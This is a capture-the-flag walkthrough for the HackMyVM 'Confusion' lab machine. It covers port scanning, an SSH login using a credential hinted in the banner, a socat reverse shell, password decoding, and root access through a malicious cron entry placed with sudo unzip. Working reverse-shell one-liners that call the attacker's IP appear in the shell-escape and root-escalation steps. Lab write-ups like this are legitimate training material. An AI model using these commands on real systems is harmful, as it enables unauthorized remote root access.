HackMyVM - Confusion - Walkthrough

Confusion –HackMyVM – Walkthrough

So Confusion is the perfect name for this machine, more rabit holes than watership down...

https://hackmyvm.eu/machines/machine.php?vm=Confusion

Running virtualbox with kali [10.0.0.11]

 I gave up trying to make this look pretty! and I did not include the hash or actual passwords.

Identify the target

┌──(kali㉿kali)-[~/confusion]

└─$ nmap -sn  10.0.0.0/24

Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-29 02:59 EDT

Nmap scan report for 10.0.0.11

Host is up (0.0014s latency).

Nmap scan report for 10.0.0.12

Host is up (0.0014s latency).

Nmap done: 256 IP addresses (2 hosts up) scanned in 4.91 seconds

Scan for ports

─$ sudo nmap -sC -sV -O -p-  10.0.0.12  

[sudo] password for kali: 

Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-29 03:19 EDT

Nmap scan report for 10.0.0.12

Host is up (0.00043s latency).

Not shown: 65533 closed ports

PORT      STATE SERVICE VERSION

22/tcp    open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)

| ssh-hostkey: 

|   3072 04:32:4e:fc:d9:70:a0:8a:47:4d:f5:a6:86:aa:bd:5f (RSA)

|   256 70:c2:bd:7d:b9:25:6d:36:92:fd:2a:8e:64:24:bd:73 (ECDSA)

|_  256 84:28:9c:40:fe:c4:26:bf:55:61:4c:58:c5:23:77:35 (ED25519)

32145/tcp open  unknown

| fingerprint-strings: 

|   GenericLines: 

|     Welcome To The My Magic World

|     many times you want to ping?: Traceback (most recent call last):

|     File "/opt/ping.py", line 7, in <module>

|     no_of_packets = int(input("How many times you want to ping?: "))

|     File "<string>", line 0

|     SyntaxError: unexpected EOF while parsing

|   GetRequest: 

|     Welcome To The My Magic World

|     many times you want to ping?: Traceback (most recent call last):

|     File "/opt/ping.py", line 7, in <module>

|     no_of_packets = int(input("How many times you want to ping?: "))

|     File "<string>", line 1, in <module>

|     NameError: name 'GET' is not defined

|   HTTPOptions, RTSPRequest: 

|     Welcome To The My Magic World

|     many times you want to ping?: Traceback (most recent call last):

|     File "/opt/ping.py", line 7, in <module>

|     no_of_packets = int(input("How many times you want to ping?: "))

|     File "<string>", line 1, in <module>

|     NameError: name 'OPTIONS' is not defined

|   NULL: 

|     Welcome To The My Magic World

|_    many times you want to ping?:

1 service unrecognized despite returning data. If you know the service/version,

port 22 SSH

Port 32145 – looks like python running from /opt/ping.py

After much poking on 32145 and lots of researching running python as a service and exploits I gave up on that and tried SSH…

└─$ ssh 10.0.0.12                 

Have you ever thought?

     If 

 Cindrella's 

   Shoe Fit 

  Perfectly 

   Then Why 

  Did It Fall 

    Off?

still:confused?

Then go for Port 32145 :)

kali@10.0.0.12's password:

could “still:confused?” be a “username”:”password” combination ?

still@10.0.0.12's password: 

Linux confusion 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64

The programs included with the Debian GNU/Linux system are free software;

the exact distribution terms for each program are described in the

individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent

permitted by applicable law.

Last login: Fri Oct 29 00:47:28 2021 from 10.0.0.11

Welcome To My Secret Most Secure Shell :p

vi /etc/passwd

Vim: Warning: Output is not to a terminal

There seems to be some restricted commands and it doesn’t display the standard output so lets try something different (remember the rabbit hole for python services….)

Setup a listener on the attack box

nc -v -n -l -p 4444 

try and connect to it from the victim:

Welcome To My Secret Most Secure Shell :p

socat TCP4:10.0.0.11:4444 exec:/bin/bash

└─$ nc -v -n -l -p 4444

listening on [any] 4444 ...

connect to [10.0.0.11] from (UNKNOWN) [10.0.0.12] 56110

pwd

/home/still

ls -l

total 8

-r-------- 1 sammy sammy  24 Oct 25 14:47 password.txt

-r-x--x--x 1 still still 521 Oct 25 13:49 SoMuchConfusion

sudo -l

Matching Defaults entries for still on confusion:

    env_reset, mail_badpass,

    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User still may run the following commands on confusion:

    (sammy) NOPASSWD: /usr/bin/python3 /opt/password.py

sudo -u sammy /usr/bin/python3 /opt/password.py

QWJCYXJQbmFQZW5weFpsQ2*************

So we have a new user “sammy” (alowed to run a special comand)and something with the potential to be a password.

(dosnt work)

https://www.dcode.fr/cipher-identifier suggests its base64

Base64 decoded returns:  AbBarPnaPenpx********

(doesn’t work)

https://www.dcode.fr/cipher-identifier suggests: Rot-13

NoOneCanJust*************

Success

We have the user.txt

Escalate to root

sammy@confusion:~$ sudo -l

Matching Defaults entries for sammy on confusion:

    env_reset, mail_badpass,

    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sammy may run the following commands on confusion:

    (root) NOPASSWD: /usr/bin/unzip

Create a new file, expcron containing:

*/5 *     * * *     root   /usr/bin/nc -c /bin/bash\ -i 10.0.0.11 1234 0>&1

zip cron.zip expcron

then using the sudo access unzip it into /etc/cron.d, setup a listener and wait a few mins!

sudo /usr/bin/unzip cron.zip -d /etc/cron.d

nc -v -n -l -p 1234

listening on [any] 1234 ...

connect to [10.0.0.11] from (UNKNOWN) [10.0.0.12] 57438

whoami

root

id

uid=0(root) gid=0(root) groups=0(root)

ls

root.txt

cat root.txt             

cb9***************************

References:

https://www.dcode.fr/cipher-identifier

https://erev0s.com/blog/encrypted-bind-and-reverse-shells-socat/